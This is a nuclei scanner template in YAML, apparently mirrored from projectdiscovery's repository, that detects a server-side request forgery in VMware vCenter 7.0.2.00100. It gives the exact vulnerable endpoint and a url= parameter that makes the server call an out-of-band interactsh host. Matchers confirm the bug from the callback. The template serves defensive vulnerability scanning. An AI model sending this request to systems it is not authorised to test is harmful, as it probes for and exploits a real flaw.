mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-09 04:03:16 +08:00
30 lines
1.0 KiB
YAML
30 lines
1.0 KiB
YAML
id: vmware-vcenter-ssrf
|
|
|
|
info:
|
|
name: VMware vCenter - Server-Side Request Forgery/Local File Inclusion/Cross-Site Scripting
|
|
author: pdteam
|
|
severity: critical
|
|
description: VMware vCenter 7.0.2.00100 is susceptible to multiple vulnerabilities including server-side request forgery, local file inclusion, and cross-site scripting.
|
|
reference:
|
|
- https://github.com/l0ggg/VMware_vCenter
|
|
metadata:
|
|
max-request: 1
|
|
tags: ssrf,lfi,xss,oast,vcenter,vmware
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: Java"
|
|
# digest: 4b0a00483046022100a966511d23c2e515b0a0b5b6573b9f8dd2501d59b3d32896eb7c99ed9e558a530221009530b3e8217549d8bb7604264159dde2bb0b8874e6cd5aba58b8cf65d3b9e571:922c64590222798bb761d5b6d8e72950 |